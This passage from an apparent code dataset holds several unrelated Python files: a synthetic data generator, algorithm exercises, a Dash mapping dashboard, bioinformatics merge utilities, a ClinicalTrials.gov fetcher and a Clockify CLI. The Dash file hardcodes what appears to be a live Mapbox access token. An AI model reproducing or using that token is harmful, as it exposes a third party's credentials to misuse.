parser.add_argument('--Tmax', type=int, default=110,\n help='Length of time series, default : 100')\n parser.add_argument('--Nmax', type=int, default=5000, help=\"Max number of sequences to generate.\")\n parser.add_argument('--seed', type=int, default=1111,\n help='random seed')\n parser.add_argument('--output_dir', type=str, default='simulated_data/',\n help='dir in which to save generated dataset')\n args = parser.parse_args()\n \n # Number of time steps\n# Tmin = args.Tmin\n Tmax = args.Tmax\n\n # define number of channels in each sequence \n D = 1\n n_states = 3\n \n # define total number of sequences\n Nmax = args.Nmax\n\n # define 2 states {0 : Background, 1 : state A}\n states = np.arange(n_states)\n init_proba_K = (0.5, 0.49, 0.01)\n\n # Create a probability transition matrix for the 3 states\n trans_proba_KK = [(0.5, 0.5, 0.0),\n (0.492, 0.5, 0.008),\n (0.0, 1.0, 0.0)]\n\n# mean_overheat = 3\n\n# stddev_KD = np.ones((n_states, D))\n# stddev_KD[2] = 0.3\n\n# mean_KD = np.zeros((n_states, D))\n# mean_KD[0, 0] = 0\n# mean_KD[1, 0] = -1\n# mean_KD[2, 0] = mean_overheat\n \n mean_overheat = 5\n\n stddev_KD = np.ones((n_states, D))\n stddev_KD[2] = 0.3\n\n mean_KD = np.zeros((n_states, D))\n mean_KD[0, 0] = -4\n mean_KD[1, 0] = -5\n mean_KD[2, 0] = mean_overheat\n\n # define how long to hold a state\n duration = 2\n \n # set random seed to regenerate the same data for reproducability\n np.random.seed(args.seed)\n \n # create a synthetic dataset of sequences and labels. \n state_sequences_TN = np.nan + np.zeros([Tmax, Nmax])\n start_time_sec = time.time()\n T = Tmax # fix the number of time-steps for all sequences\n \n \n for j in range(Nmax):\n# T = rs.randint(low=Tmin, high=Tmax+1)\n state_sequences_TN[:T,j] = generate_state_sequence(T, states, init_proba_K, \n trans_proba_KK, \n duration)\n\n # generate the time series data from the state sequence\n data_DTN, y_N = generate_data_sequences_given_state_sequences(\n state_sequences_TN, states, mean_KD, stddev_KD)\n N = data_DTN.shape[2]\n\n seq_list = list()\n feature_columns = ['temperature']\n for n in range(N):\n mask_T = np.isfinite(data_DTN[0, :, n])\n tidy_df = pd.DataFrame(data_DTN[:, :, n][:, mask_T].T, columns=feature_columns)\n tidy_df['timestep'] = np.arange(np.sum(mask_T))\n tidy_df['sequence_id'] = n\n tidy_df['did_overheat_binary_label'] = int(y_N[n])\n seq_list.append(tidy_df)\n\n tidy_df = pd.concat(seq_list)\n tidy_pertstep_df = tidy_df[['sequence_id', 'timestep'] + feature_columns].copy()\n tidy_perseq_df = tidy_df[['sequence_id', 'did_overheat_binary_label']]\n tidy_perseq_df = tidy_perseq_df.drop_duplicates().copy()\n\n tidy_pertstep_df.to_csv(\n os.path.join(args.output_dir, 'cnn_features_per_tstep.csv'),\n index=False)\n tidy_perseq_df.to_csv(\n os.path.join(args.output_dir, 'cnn_outcomes_per_seq.csv'),\n index=False)\n\n print(\"Wrote features to:\")\n print(\n os.path.join(args.output_dir, 'cnn_features_per_tstep.csv'))\n print(\"Wrote outcomes to:\")\n print(\n os.path.join(args.output_dir, 'cnn_outcomes_per_seq.csv'))\n\n \n # create a plot showing examples of positive and negative labels in the simulated data\n # get examples of time series sequence with label 0 and 1 and plot it\n inds_label_0 = np.flatnonzero(y_N==0)\n inds_label_1 = np.flatnonzero(y_N==1)\n \n \n print('Total number of sequences : %s'%(len(y_N)))\n print('Number of negative sequences : %s'%(len(inds_label_0)))\n print('Number of positive sequences : %s'%(len(inds_label_1)))\n \n # plot example sequence\n fontsize = 10\n \n inds_list = [inds_label_0, inds_label_1]\n y_labels = ['y=0', 'y=1']\n \n for i in range(len(y_labels)):\n f,axs = plt.subplots(2,1, sharex=True, figsize=(15, 5))\n axs[0].plot(range(Tmax), state_sequences_TN[:, inds_list[i][0]], '.')\n axs[0].set_ylabel('State', fontsize = fontsize)\n axs[0].set_title('State Sequence for %s'%y_labels[i])\n axs[0].set_yticks(np.arange(3))\n axs[0].set_ylim([-.5, 2.5])\n axs[1].plot(range(Tmax), data_DTN[:,:,inds_list[i][0]].T)\n axs[1].set_xlim([0, Tmax])\n axs[1].set_ylim([-10, 10])\n axs[1].set_xlabel('Time', fontsize = fontsize)\n axs[1].set_ylabel('Temperature (deg C)', fontsize = fontsize)\n axs[1].set_title('Generated Sequence for %s'%y_labels[i])\n\n f.savefig(os.path.join(args.output_dir, 'cnn_example_%s_sequence.png'%y_labels[i]))\n \n","sub_path":"scripts/toy_overheat/standardize_dataset/make_dataset_for_cnn.py","file_name":"make_dataset_for_cnn.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"433672687","text":"# Uses python3\nimport sys\n\n\ndef merge_sort(a, left, right):\n if left >= right:\n return 0\n\n mid = (left + right) // 2\n\n left_count = merge_sort(a, left, mid)\n right_count = merge_sort(a, mid + 1, right)\n\n # count 记录合并左右两个数组时发现的逆序对\n count = 0\n # copy数组记录从left到right之间排序后的数组a\n copy = (right - left + 1) * [0]\n # i, j 分别是左右两个数组的起点\n i, j = left, mid+1\n k = 0\n while i <= mid and j <= right:\n # 发现逆序,数逆序对的个数,把右边数组的对应元素(就是较小的那个数)放到copy里去\n if a[i] > a[j]:\n copy[k] = a[j]\n j += 1\n count += mid + 1 - i\n # 没有逆序,把左边数组的对应元素放到copy里去\n else:\n copy[k] = a[i]\n i += 1\n k += 1\n # 其中一个数组遍历完之后,把另一个数组直接复制到copy里去\n while i <= mid:\n copy[k] = a[i]\n i += 1\n k += 1\n while j <= right:\n copy[k] = a[j]\n j += 1\n k += 1\n for i in range(left, right + 1):\n # a数组从i开始, copy数组从0开始\n a[i] = copy[i-left]\n return left_count + right_count + count\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n, *a = list(map(int, input.split()))\n # n, *a = list(map(int, input().split()))\n print(merge_sort(a, 0, len(a) - 1))\n\n","sub_path":"C1W4 Divide and Conquer/4_Number_of_Inversions.py","file_name":"4_Number_of_Inversions.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113433361","text":"import turtle as t\n\n\ndef rectangle(horizontal, vertical, color):\n t.pendown()\n t.pensize(1)\n t.color(color)\n t.begin_fill()\n for couter in range(1, 3):\n t.forward(horizontal)\n t.right(90)\n t.forward(vertical)\n t.right(90)\n t.end_fill()\n t.penup()\n\ndef setup():\n t.penup()\n t.speed('slow')\n t.bgcolor('Dodger blue')\n\ndef draw_robot():\n t.goto(-100,-150)\n rectangle(50, 20, 'blue')\n t.goto(-30, -150)\n rectangle(50, 20, 'blue')\n\ndef main():\n setup()\n draw_robot()\n t.hideturtle()\n t.mainloop()\n\nif __name__ == \"__main__\":\n main()","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604984468","text":"\n# coding: utf-8\n\n# In[11]:\n\n\n# Dash\n\nimport pandas as pd\nimport dash\nfrom dash.dependencies import Input, Output, State, Event\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.plotly as py\nfrom plotly import graph_objs as go\nfrom plotly.graph_objs import *\nimport dash_table_experiments as dt\n\nMAPBOX_KEY='pk.eyJ1Ijoia2V2YWxzaGFoIiwiYSI6ImNqbW1nbG90MDBhNTQza3IwM3pvd2I3bGUifQ.dzdTsg69SdUXY4zE9s2VGg'\n\nfrom dotenv import find_dotenv, load_dotenv\nimport os\n\n# Loads the dotenv file into the environment. This exposes the variables in that\n# file as though they were actual environment variables to the os module.\n#load_dotenv(find_dotenv())\n\n#MAPBOX_KEY = os.environ.get(\"MAPBOX_KEY\")\n\n\n# In[12]:\n\n\napp = dash.Dash()\n\n\n# In[13]:\n\n\n# Title the app.\napp.title = \"Stroom Product Prototype\"\n\n\n# In[14]:\n\n\n# Layout\n\n# Boostrap CSS.\napp.css.append_css({\n \"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\"\n})\n\n# Extra Dash styling.\napp.css.append_css({\n \"external_url\": 'https://codepen.io/chriddyp/pen/bWLwgP.css'\n})\n\n# JQuery is required for Bootstrap.\napp.scripts.append_script({\n \"external_url\": \"https://code.jquery.com/jquery-3.2.1.min.js\"\n})\n\n# Bootstrap Javascript.\napp.scripts.append_script({\n \"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"\n})\n\n\n# In[15]:\n\n\n# Read Pandas dataframe\nEmpComm1 = pd.read_pickle('EmpComm1.pickle')\nEmpComm1.tail(5)\n\n\n# In[27]:\n\n\n# Company list\nCompany_List = sorted(list(EmpComm1['Company'].unique()))\nLocation_List = sorted(list(EmpComm1['OfficeLocation'].unique()))\n\n# Team or Grouping List\nTeam_List = list(EmpComm1['Team'].unique())\n\n\n# In[28]:\n\n\n# App Layout\n\napp.layout = html.Div([\n \n html.H3(\"Organization View\"),\n dcc.Dropdown(\n id='company-select',\n options=[{'label': i, 'value': i} for i in Company_List],\n value='Company A'\n ),\n \n dcc.Dropdown(\n id='location-select',\n options=[{'label': i, 'value': i} for i in Location_List],\n value='Location 1'\n ),\n \n dcc.Graph(id='map-graph'),\n \n dt.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n max_rows_in_viewport=6,\n id='table'\n )\n\n])\n\n\n# In[29]:\n\n\n@app.callback(Output(\"map-graph\", \"figure\"),\n [\n Input(\"company-select\", \"value\")\n ]\n )\ndef update_graph(selected_value):\n \n # Filter the dataframe with selected value\n Comp_data = EmpComm1[EmpComm1['Company'] == selected_value]\n \n colors = {\n 'R&D':'red', \n 'Engineering':'blue', \n 'Sales':'green', \n 'Marketing':'black', \n 'Customer Support':'grey',\n 'Legal':'yellow',\n 'Operations':'violet',\n 'Human Resources':'pink',\n 'Accounting':'chocolate4'\n }\n \n data = [] \n # Plot home location and map commute to work. \n # Create a data dictionary of lat and lon to plot\n \n # Color by category group by\n for i, row in Comp_data.iterrows():\n \n hlat, hlong = row['HomeLocation']\n time = row['Duration']\n team = row['Team']\n \n data.append({\n \"type\": \"scattermapbox\",\n \"lat\": [hlat],\n \"lon\": [hlong],\n \"name\": \"Home Location\",\n \"text\": time,\n \"hoverinfo\": time,\n \"mode\": \"markers\",\n \"marker\": {\n \"symbol\": \"circle\",\n \"color\": colors[team],\n \"size\": 6,\n \"opacity\": 0.7\n }\n }\n \n ) \n \n for i, row in Comp_data.iterrows():\n \n wlat, wlong = row['WorkLocation']\n \n data.append({\n \"type\": \"scattermapbox\",\n \"lat\": [wlat],\n \"lon\": [wlong],\n \"name\": \"Work Location\",\n \"text\": time,\n \"mode\": \"markers\",\n \"marker\": {\n \"symbol\": \"suitcase\",\n \"color\": \"black\",\n \"size\": 12,\n \"opacity\": 0.7\n }\n }\n \n ) \n \n layout = {\n \"autosize\": True,\n \"hovermode\": \"closest\",\n \"title\": \"Distribution of Workforce\",\n \"showlegend\": False,\n \"mapbox\": {\n \"accesstoken\": MAPBOX_KEY,\n \"bearing\": 0,\n \"center\": {\n \"lat\": 37.77,\n \"lon\": -122.43\n },\n \"pitch\": 0,\n \"zoom\": 10,\n \"style\": \"outdoors\",\n }\n } \n \n return {\"data\": data, \"layout\": layout}\n\n@app.callback(Output('table', 'rows'),\n [\n Input(\"company-select\", \"value\")\n ]\n )\ndef update_datatable(selected_value):\n \"\"\"\n For user selections, return the relevant table\n \"\"\"\n # Filter the dataframe with selected value\n Comp_data = EmpComm1[EmpComm1['Company'] == selected_value]\n Comp_data_subset = Comp_data[['EmployeeID',\n 'First',\n 'Last',\n 'Team',\n 'Transportation',\n 'Distance (mi)',\n 'Duration',\n 'Cost(USD)']]\n \n return Comp_data_subset.to_dict('records')\n\n\n# In[9]:\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"30916948","text":"from textwrap import indent\nfrom typing import Union, List, Dict\nfrom anndata import AnnData\nfrom ..io._convert_anndata import (\n _sanitize_anndata,\n to_airr_cells,\n from_airr_cells,\n)\nfrom ..io._datastructures import AirrCell\nfrom ..io._util import _check_upgrade_schema\nfrom scanpy import logging\nimport itertools\nimport pandas as pd\n\n\n@_check_upgrade_schema(check_args=(0, 1))\ndef merge_airr_chains(adata: AnnData, adata2: AnnData) -> None:\n \"\"\"\n Merge two AnnData objects with :term:`IR` information (e.g. BCR with TCR).\n\n Decomposes the IR information back into :class:`scirpy.io.AirrCell` objects\n and merges them on a chain-level. If both objects contain the same cell-id, and\n the same chains, the corresponding row in `adata.obs` will be unchanged.\n If both objects contain the same cell-id, but different chains, the chains\n will be merged into a single cell such that it can be annotated as\n :term:`ambiguous` or :term:`multi-chain`\n if appropriate. If a cell contains both TCR and BCR chains, they will both\n be kept and can be identified as `ambiguous` using the :func:`scirpy.tl.chain_qc`\n function.\n\n The function performs a \"left join\", i.e. all cells not present in `adata` will\n be discarded. Of `adata2` the function only retains information from `obs`.\n\n To simply add IR information onto an existing `AnnData` object with transcriptomics\n data, see :func:`~scirpy.pp.merge_with_ir` (this function can do this, too, but\n `merge_with_ir` is more efficient).\n\n Modifies `adata` inplace.\n\n Parameters\n ----------\n adata\n first AnnData object containing IR information\n adata2\n second AnnData object containing IR information\n \"\"\"\n ir_objs1 = to_airr_cells(adata)\n ir_objs2 = to_airr_cells(adata2)\n # Compute `include_fields` to avoid including fields that are part of\n # empty airr cells as part of the rearrangement standard, but not included\n # in the original anndata object.\n include_fields = set(\n x.split(\"_\", maxsplit=3)[-1] if x.startswith(\"IR_\") else x\n for x in itertools.chain(adata.obs.columns, adata2.obs.columns)\n )\n cell_dict: Dict[str, AirrCell] = dict()\n for cell in itertools.chain(ir_objs1, ir_objs2):\n try:\n tmp_cell = cell_dict[cell.cell_id]\n except KeyError:\n cell_dict[cell.cell_id] = cell\n else:\n # this is a legacy operation. With adatas generated with scirpy\n # >= 0.7 this isn't necessary anymore, as all chains are preserved.\n tmp_cell[\"multi_chain\"] = bool(tmp_cell[\"multi_chain\"]) | bool(\n cell[\"multi_chain\"]\n )\n for tmp_chain in cell.chains:\n tmp_cell.add_chain(tmp_chain)\n # add cell-level attributes\n tmp_cell.update(cell)\n\n # remove duplicate chains\n # https://stackoverflow.com/questions/9427163/remove-duplicate-dict-in-list-in-python\n for cell in cell_dict.values():\n cell._chains = [dict(t) for t in set(tuple(d.items()) for d in cell.chains)]\n\n # only keep entries that are in `adata` and ensure consistent ordering\n adata.obs = from_airr_cells(\n cell_dict.values(), include_fields=include_fields\n ).obs.reindex(adata.obs_names)\n\n\n@_check_upgrade_schema(check_args=(1,))\ndef merge_with_ir(\n adata: AnnData, adata_ir: AnnData, on: Union[List[str], None] = None, **kwargs\n) -> None:\n \"\"\"Merge adaptive immune receptor (:term:`IR`) data with transcriptomics data into a\n single :class:`~anndata.AnnData` object.\n\n :ref:`Reading in IR data` results in an :class:`~anndata.AnnData`\n object with IR information stored in `obs`. Use this function to merge\n it with another :class:`~anndata.AnnData` containing transcriptomics data.\n To add additional IR data on top of on top of an :class:`~anndata.AnnData`\n object that already contains IR information (e.g. :term:`BCR` on top of\n :term:`TCR` data.), see :func:`~scirpy.pp.merge_airr_chains`.\n\n Merging keeps all objects (e.g. `neighbors`, `umap`) from `adata` and integrates\n `obs` from `adata_ir` into `adata`. Everything other than `.obs` from `adata_ir`\n will be discarded.\n\n This function is a thin wrapper around :func:`pandas.merge`. The function performs\n a \"left join\", i.e. all cells not present in `adata` will be discarded.\n\n Modifies `adata` inplace.\n\n Parameters\n ----------\n adata\n AnnData with the transcriptomics data. Will be modified inplace.\n adata_ir\n AnnData with the adaptive immune receptor (IR) data\n on\n Merge on columns in addition to 'index'. Defaults to \"batch\" if present in\n both `obs` data frames.\n **kwargs\n Passed to :func:`pandas.merge`.\n \"\"\"\n if len(kwargs):\n raise ValueError(\n \"Since scirpy v0.5, this function always performs a 'left' merge \"\n \"on the index and does not accept any additional parameters any more.\"\n )\n if not adata.obs_names.is_unique:\n raise ValueError(\"obs names of `adata` need to be unique for merging.\")\n if not adata.obs_names.is_unique:\n raise ValueError(\"obs_names of `adata_ir` need to be unique for merging.\")\n if on is None and \"batch\" in adata.obs.columns and \"batch\" in adata_ir.obs.columns:\n on = [\"batch\"]\n\n if \"has_ir\" in adata.obs.columns:\n raise ValueError(\n \"It seems you already have immune receptor (IR) data in `adata`. \"\n \"Please use `ir.pp.merge_airr_chains` instead. \"\n )\n\n # Since pandas does not support both merge on index and columns, we\n # need to name the index, and use the index name in `on`.\n orig_index_name = adata.obs.index.name\n if \"obs_names\" in adata.obs.columns or \"obs_names\" in adata_ir.obs.columns:\n raise ValueError(\"This doesn't work if there's a column named 'obs_names'. \")\n adata.obs.index.name = \"obs_names\"\n adata_ir.obs.index.name = \"obs_names\"\n if on is None:\n on = list()\n on.insert(0, \"obs_names\")\n\n adata.obs = adata.obs.merge(\n adata_ir.obs, how=\"left\", on=on, validate=\"one_to_one\", **kwargs\n )\n\n adata.obs.index.name = orig_index_name\n\n _sanitize_anndata(adata)\n","sub_path":"scirpy/_preprocessing/_merge_adata.py","file_name":"_merge_adata.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"499105319","text":"\"\"\"\n Function to Interact with ClinicalTrials.gov\n\n @author: Riccardo Miotto \n\n Modified on Sep 15th 2014\n @author: Praveen Chandar < (at) columbia (dot) edu >\n\"\"\"\nimport re\nfrom ctgov.utility.web import download_web_data\nfrom ctgov.utility.log import strd_logger\n\n\nlog = strd_logger('ctgov-fetch')\n\n\ndef get_clinical_trials():\n \"\"\"\n Obtains the latest list of all clinical trials from clinicaltrails.gov\n\n :return:\n \"\"\"\n url = 'http://clinicaltrials.gov/ct2/crawl'\n html = download_web_data(url)\n pages = re.findall(r'href=\"/ct2/crawl/(\\d+)\"', html)\n lnct = set()\n for p in pages:\n html = download_web_data('%s/%s' % (url, p))\n ct = re.findall(r'href=\"/ct2/show/(NCT\\d+)\"', html)\n lnct |= set(ct)\n return sorted(lnct)\n\n\ndef get_ct_rawdata(nctid, data_path):\n \"\"\"\n Downloads the specified trail from clinicaltrial.gov and\n stores the XML File in the specified location.\n\n :param nctid:\n :param data_path:\n :return:\n \"\"\"\n url = 'http://clinicaltrials.gov/show/%s?displayxml=true' % nctid\n raw_data = download_web_data(url)\n out_path = data_path + '/' + nctid + '.xml'\n try:\n fid = open(out_path, 'w')\n fid.write(raw_data)\n fid.close()\n return True\n except Exception as e:\n log.error(e)\n return False","sub_path":"util/url_fetch.py","file_name":"url_fetch.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"415001841","text":"try:\n resultado = 10 / 0\nexcept ZeroDivisionError:\n print( 'Error: Estas dividiendo entre 0' )\n\n\nlista = [1,2,3,4,5]\ntry:\n print( lista[10] )\nexcept IndexError:\n print( 'Error: El indice esta fuera del rango' )\n\n\ncolores = { 'rojo':'red', 'verde':'green', 'negro':'black' }\ntry:\n print( colores['blanco'] )\nexcept KeyError:\n print( 'Error: la key a la que tratas de acceder no se encuentra en el diccionario' )\n\n\ntry:\n resultado = 15 + '20'\nexcept TypeError:\n print( 'Error: Solo es posible sumar/concatenar datos del mismo tipo, transforma el int a string o el string a int' )\n\n\n\ndef agregar_una_vez( lista, num ):\n try:\n if num not in lista:\n lista.append( num )\n else:\n raise ValueError('Elemento ya en lista')\n except ValueError:\n print( 'Error: Imposible añadir elementos duplicados => {}'.format( num ) )\n\nelementos = [1, 5, -2]\nagregar_una_vez( elementos, 10 )\nagregar_una_vez( elementos, -2 )\nagregar_una_vez( elementos, \"Hola\" )\nprint( elementos )","sub_path":"016SectionPractice.py","file_name":"016SectionPractice.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"301820874","text":"# Copyright (c) 2012-2013 Oleksandr Sviridenko\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nfrom les.utils import logging\nfrom les.drivers import drivers_pb2\nfrom les.drivers.local_elimination_driver import LocalEliminationDriver\nfrom les.drivers.oracle_driver.oracle_driver import OracleDriver\nfrom les.drivers.greedy_driver.greedy_driver import GreedyDriver\nfrom les.drivers.preproc_driver.preproc_driver import PreprocDriver\n\n\nLOCAL_ELIMINATION_DRIVER = drivers_pb2.LOCAL_ELIMINATION_DRIVER\nORACLE_DRIVER = drivers_pb2.ORACLE_DRIVER\nGREEDY_DRIVER = drivers_pb2.GREEDY_DRIVER\nCOMPL_DIFF_DRIVER = drivers_pb2.PREPROC_DRIVER\n\n_DRIVERS_TABLE = {\n LOCAL_ELIMINATION_DRIVER: LocalEliminationDriver,\n ORACLE_DRIVER: OracleDriver,\n GREEDY_DRIVER: GreedyDriver,\n COMPL_DIFF_DRIVER: PreprocDriver\n}\n\ndef get_instance_of(driver_id, *args, **kwargs):\n if not isinstance(driver_id, int):\n raise TypeError()\n if not driver_id in _DRIVERS_TABLE:\n return None\n driver_class = _DRIVERS_TABLE[driver_id]\n return driver_class(*args, **kwargs)\n","sub_path":"src/main/python/les/drivers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"442664765","text":"def main():\n\timport time\n\tfrom pprint import pprint\n\n\tstartTime = time.time()\n\n\tfile = open(\"input\", \"r\")\n\tdata = file.readlines()\n\tfile.close()\n\n\tdef is_it_arithmetric_sequence(sequence):\n\t\tdiff = int(sequence[1]) - int(sequence[0])\n\t\tprev = int(sequence[0]) - diff\n\t\tfor i in sequence:\n\t\t\tif not prev + diff == int(i):\n\t\t\t\treturn False\n\t\t\tprev = int(i)\n\t\treturn True\n\n\t# print(is_it_arithmetric_sequence(\"1234\"))\n\n\tcurrentTime = \"1200\"\n\tpeopleTime = \"1200\"\n\tpeopleTimeList = []\n\tsequence_count = 0\n\tfor i in range(int(data[0]) + 1):\n\t\t# print(time[:-2])\n\t\t# print(time[-2:])\n\t\tcurrentTime = str(int(currentTime[:-2]) + (i // ((int(currentTime[:-2]) - 11) * 60))) + currentTime[-2:]\n\t\t# currentTime = str(int(currentTime) + (i % 60))\n\t\tpeopleTime = str(int(currentTime) + (i % 60))\n\t\t# if int(peopleTime[:-2]) > 12:\n\t\t# \tif not peopleTime[:-2] == \"12\":\n\t\t# \t\tpeopleTime = str(int(peopleTime[:-2]) - 12) + peopleTime[-2:]\n\t\tif int(peopleTime[:-2]) > 12:\n\t\t\tpeopleTime = str(int(peopleTime[:-2]) % 12) + peopleTime[-2:]\n\t\t# if int(peopleTime[:-2]) - 12 < 10 or int(peopleTime[:-2]) - 12 == 0:\n\t\t# \tpeopleTime = \"0\" + currentTime\n\t\tprint(peopleTime[:-2] + \":\" + peopleTime[-2:], end=\"\")\n\t\tif is_it_arithmetric_sequence(peopleTime):\n\t\t\tsequence_count += 1\n\t\t\tprint(\" *\", end=\"\")\n\t\t\tpeopleTimeList.append(peopleTime[:-2] + \":\" + peopleTime[-2:] + \" *\")\n\t\tprint(\" (\" + str(i) + \"/\" + str(int(data[0])) + \") \" + str(i / int(data[0]) * 100) + \"%\")\n\n\tprint(\"\\n\" + str(sequence_count))\n\tpprint(peopleTimeList)\n\n\tendTime = time.time()\n\tprint(\"Runtime: \" + str(endTime - startTime))\n\n\treturn peopleTimeList\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"2017/junior/j4 - favourate times/ft-original.py","file_name":"ft-original.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"306761326","text":"import numpy as np\nimport numba\n\n@numba.njit(cache=True)\ndef bootstrapCI(data: np.ndarray, bootstraps: int = 10000, seed: int = 0):\n np.random.seed(seed)\n assert len(data.shape) == 2\n seeds, measurements = data.shape\n\n out = np.empty((3, measurements))\n for i in range(measurements):\n bs = np.empty(bootstraps)\n for j in range(bootstraps):\n sub = np.random.choice(data[:, i], size=seeds, replace=True)\n bs[j] = np.mean(sub)\n\n out[0, i] = np.percentile(bs, 2.5)\n out[1, i] = np.mean(data[:, i])\n out[2, i] = np.percentile(bs, 97.5)\n\n return out\n","sub_path":"src/analysis/confidence_intervals.py","file_name":"confidence_intervals.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"442455845","text":"from __future__ import print_function\nfrom datetime import date\nimport dateutil\nimport isodate\nimport helpers\n\n\ndef list_entries(args, config, app_data):\n today_raw = date.today()\n today = today_raw.strftime('%Y-%m-%d')\n\n if args.start or args.end:\n # Handle --start and --end\n if args.start and not args.end:\n from_date = args.start\n\n if from_date < today:\n to_date = today\n else:\n to_date = from_date\n elif not args.start and args.end:\n to_date = args.end\n\n if to_date > today:\n from_date = today\n else:\n from_date = to_date\n else:\n from_date = args.start\n to_date = args.end\n else:\n # List defaults to current day\n from_date = today\n to_date = today\n\n # Periods will override --from and --to\n if args.period and helpers.resolve_period(args.period):\n period = helpers.resolve_period(args.period)\n from_date = period['start']\n to_date = period['end']\n\n helpers.time_entry_list(from_date, to_date, app_data['clockify'])\n\n\ndef new_entry(args, config, app_data):\n if 'hours' not in args or not args.hours:\n print('Specifiy hours.')\n return\n\n entry = app_data['clockify'].create_entry(args.id, args.comments, args.hours, args.date)\n\n if 'message' in entry and 'code' in entry:\n print(entry['message'])\n return\n\n print(helpers.entry_bullet_point(entry))\n\n print(\"Time entry created.\")\n\n\ndef update_entry(args, config, app_data):\n changed = False\n\n # Need to use cached time entry data because API doesn't support getting time entry data by ID\n cached_entry = helpers.get_cached_entry(args.id)\n\n if not cached_entry:\n print('Time entry does not exist or is not cached.')\n return\n\n # Change TimeEntrySummaryDto to work as UpdateTimeEntryRequest format (see Clockify API documentation)\n entry = {}\n entry['id'] = cached_entry['id']\n entry['description'] = cached_entry['description']\n entry['start'] = cached_entry['timeInterval']['start']\n entry['end'] = cached_entry['timeInterval']['end']\n entry['projectId'] = cached_entry['project']['id']\n entry['billable'] = cached_entry['billable']\n entry['tagIds'] = []\n\n if 'task' in cached_entry and cached_entry['task']:\n entry['taskId'] = cached_entry['task']['id']\n\n if 'tags' in cached_entry and cached_entry['tags']:\n for tag in cached_entry['tags']:\n entry['tagIds'].append(tag['id'])\n\n # Update description, if necessary\n if args.comments and args.comments != entry['description']:\n changed = True\n\n entry['description'] = args.comments\n cached_entry['description'] = args.comments\n print('Changing comments to: ' + args.comments)\n\n # Establish entry hours\n current_hours = helpers.iso_duration_to_hours(cached_entry['timeInterval']['duration'])\n\n if args.hours and (args.hours[:1] == '+' or args.hours[:1] == '-' or current_hours != float(args.hours)):\n changed = True\n\n original_hours = current_hours\n\n if args.hours[:1] == '+':\n current_hours += float(args.hours[1:])\n elif args.hours[:1] == '-':\n current_hours -= float(args.hours[1:])\n else:\n current_hours = float(args.hours)\n\n print('Changing hours from ' + str(original_hours) + ' to: ' + str(current_hours))\n\n # Change UTC start date/time, if necessary\n if args.date:\n # Convert entry date to simple sting in local timezone\n original_date_localized = dateutil.parser.parse(entry['start']).astimezone(app_data['clockify'].tz)\n original_date = original_date_localized.strftime('%Y-%m-%d')\n\n if original_date != args.date:\n changed = True\n\n # Convert new date to UTC ISO 8601\n entry['start'] = app_data['clockify'].local_date_string_to_utc_iso_8601(args.date)\n cached_entry['timeInterval']['start'] = entry['start']\n\n print('Changing activies from ' + original_date + ' to ' + args.date)\n\n # Convert UTC start/time to localized datetime and use it to calculate ISO 8601 end date/time\n start_datetime = dateutil.parser.parse(entry['start'])\n entry['end'] = app_data['clockify'].add_hours_to_localized_datetime_and_convert_to_iso_8601(start_datetime, current_hours)\n\n cached_entry['timeInterval']['duration'] = isodate.duration_isoformat(dateutil.parser.parse(entry['end']) - dateutil.parser.parse(entry['start']))\n cached_entry['timeInterval']['end'] = entry['end']\n\n if changed:\n # Perform update via API\n response = app_data['clockify'].update_entry(entry)\n\n if response.status_code == 200:\n helpers.write_cache_entry(cached_entry)\n print(helpers.entry_bullet_point(cached_entry))\n print('Time entry updated.')\n else:\n response_data = response.json()\n print('Unexpected response status code: ' + str(response.status_code))\n if 'message' in response_data:\n print('Message: ' + response_data['message'])\n else:\n print('No update as no change requested.')\n\n\ndef delete_entry(args, config, app_data):\n app_data['clockify'].delete_entry(args.id)\n print('Time entry deleted.')\n\n\ndef list_workspaces(args, config, app_data):\n for workspace in app_data['clockify'].workspaces():\n print('* {} [{}]'.format(workspace['name'], workspace['id']))\n\n\ndef list_projects(args, config, app_data):\n for project in app_data['clockify'].projects():\n print('* {} [{}]'.format(project['name'].encode('utf-8'), project['id']))\n","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"503733618","text":"import os\nimport 